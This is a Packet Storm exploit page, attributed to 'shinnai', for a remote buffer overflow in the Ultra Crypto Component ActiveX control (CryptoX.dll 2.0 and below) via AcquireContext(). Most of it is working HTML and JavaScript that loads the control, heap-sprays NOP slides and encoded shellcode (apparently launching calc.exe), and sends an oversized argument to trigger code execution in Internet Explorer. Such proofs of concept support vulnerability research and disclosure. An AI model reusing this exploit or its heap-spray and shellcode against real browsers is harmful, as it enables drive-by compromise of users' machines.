Ultra Crypto Component remote buffer overflow exploit that makes use of CryptoX.dll versions 2.0 and below using the AcquireContext() function.
450971ae74450e851185f89b5554d88740d1fe72a4772cb6352c0e12c2a0b971<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------------
<b>Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit</b>
url: http://www.ultrashareware.com/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
Heap Spray Technique was developed by SkyLined
(http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
<b>The "DeleteContext()" is vulnerable too</b>
-----------------------------------------------------------------------------------
<object id=boom classid="clsid:09C282FE-7DE7-4697-9BE2-1C4F4DA825B3" style="WIDTH: 578px; HEIGHT: 228px"></object>
<input language=JavaScript onclick=tryMe() type=button value="Launch Exploit">
<script>
var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var spraySlide = unescape("%u9090%u9090");
var heapSprayToAddress = 0x0c0c0c0c;
function tryMe()
{
var size_buff = 3200;
var x = unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.AcquireContext(x,1,1);
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return (spraySlide);
}
var heapBlockSize = 0x100000;
var SizeOfHeapDataMoreover = 0x5;
var payLoadSize = (shellcode.length * 2);
var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
</script>
</span></span>
</code></pre>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed